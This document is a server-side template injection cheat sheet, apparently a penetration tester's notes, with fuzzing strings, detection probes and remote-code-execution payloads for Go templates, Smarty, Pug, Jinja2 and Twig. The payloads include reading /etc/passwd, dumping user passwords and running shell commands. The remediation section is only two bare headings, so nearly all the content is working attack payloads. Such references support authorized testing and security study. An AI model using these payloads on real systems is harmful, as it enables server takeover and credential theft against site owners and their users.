# Server Side Template Injection (SSTI)

## Resource for more complicated payloads: <https://github.com/swisskyrepo/PayloadsAllTheThings>

## <https://book.hacktricks.xyz/>

## Payloads Fuzzing:

```
${{<%'"}}%
```

## PoC Payload for Identification:

```
${7*'7'}
```

## Explaining further about more template engines here: <https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection>

## Remediation:

### 1: Secure methods

### 2: Sanitization

## Example payloads of different templates:

## Go SSTI

#### 1)

```
{{ .Password }} (Fetches the passwords of all users) Hint: It depends on the struct the application has been made of to use the correct one! 
```

#### 2)

```
{{ .GetFile "/etc/passwd" }} (Gets the passwd linux file)
```

#### 3)

```
{{ .ExecuteCmd "whoami" }} Executes commands
```

#### 4)

```
{{ . }} (Dumps variables)
```

## PHP - Smarty

#### PoC Enumeration Payload

```
{'Hello'|upper}
```

#### RCE Payload

```
{system("id")}
```

## NodeJS - Pug

### PoC Payload

```
#{7*7}
```

### RCE Payload

```
#{root.process.mainModule.require('child_process').spawnSync('id').stdout}
```

### SpawnSync RCE Payload with arguments

```
#{root.process.mainModule.require('child_process').spawnSync('ls', ['-lah']).stdout}
```

## Python - Jinja2

### PoC Payload

```
{{7*7}}
```

### RCE Payload

```
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output("id")}}
```

### check\_output RCE Payload with arguments

```
{{"".__class__.__mro__[1].__subclasses__()[157].__repr__.__globals__.get("__builtins__").get("__import__")("subprocess").check_output(['ls', '-lah'])}}
```

## PHP - Twig

### PoC Payload

```
{{7*7}}
```

### RCE Payload

```
{{exec('id')}}

{{['id',""]|sort('passthru')}}
```